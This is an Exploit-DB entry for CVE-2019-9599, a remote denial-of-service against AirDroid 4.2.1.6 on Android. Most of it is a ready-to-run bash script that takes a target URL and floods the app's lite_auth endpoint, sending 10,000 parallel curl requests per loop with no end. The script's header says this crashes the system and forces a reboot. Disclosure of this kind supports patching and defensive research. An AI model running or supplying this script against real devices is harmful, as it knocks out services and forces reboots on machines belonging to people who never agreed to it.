AirDroid 4.2.1.6 - Denial of Service

EDB-ID:

46337

CVE:

2019-9599

EDB Verified:

Author:

s4vitar

Type:

dos

Exploit: /

Platform:

Android

Date:

2019-02-11

Vulnerable App:

#!/bin/bash

# *********************************************************************
# *             Author: Marcelo Vázquez (aka s4vitar)                 *
# *  AirDroid Denial of Service (DoS) & System Crash + Forced Reboot  *
# *********************************************************************

# Exploit Title: AirDroid Remote Denial of Service (DoS) & System Crash + Forced Reboot
# Date: 2019-02-13
# Exploit Author: Marcelo Vázquez (aka s4vitar)
# Collaborators: Victor Lasa (aka vowkin)
# Vendor Homepage: https://web.airdroid.com/
# Software Link: https://play.google.com/store/apps/details?id=com.sand.airdroid&hl=en
# Version: <= AirDroid 4.2.1.6
# Tested on: Android

url=$1 # Example: http://192.168.1.46:8888
requests=0

trap ctrl_c INT

# If Ctrl+C key is pressed then the threads are killed
function ctrl_c() {
        echo -e "\n\n[*]Exiting...\n" && tput cnorm
        pkill curl > /dev/null 2>&1
        exit
}

# Detect number of arguments being passed to the program
if [ "$(echo $#)" == "1" ]; then
	# Infinite Loop
	tput cnorm && while true; do
		# We send 10000 requests in thread
		for i in $(seq 1 10000); do
			curl --silent "$url/sdctl/comm/lite_auth/" &
			let requests+=1
		done && wait # Here we wait for the threads to finish
	echo "Requests Sent: $requests"
	done
else
	echo -e "\nUsage: ./AirDroid_request.sh http://ip:port\n"
fi

Tags: Denial of Service (DoS)

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services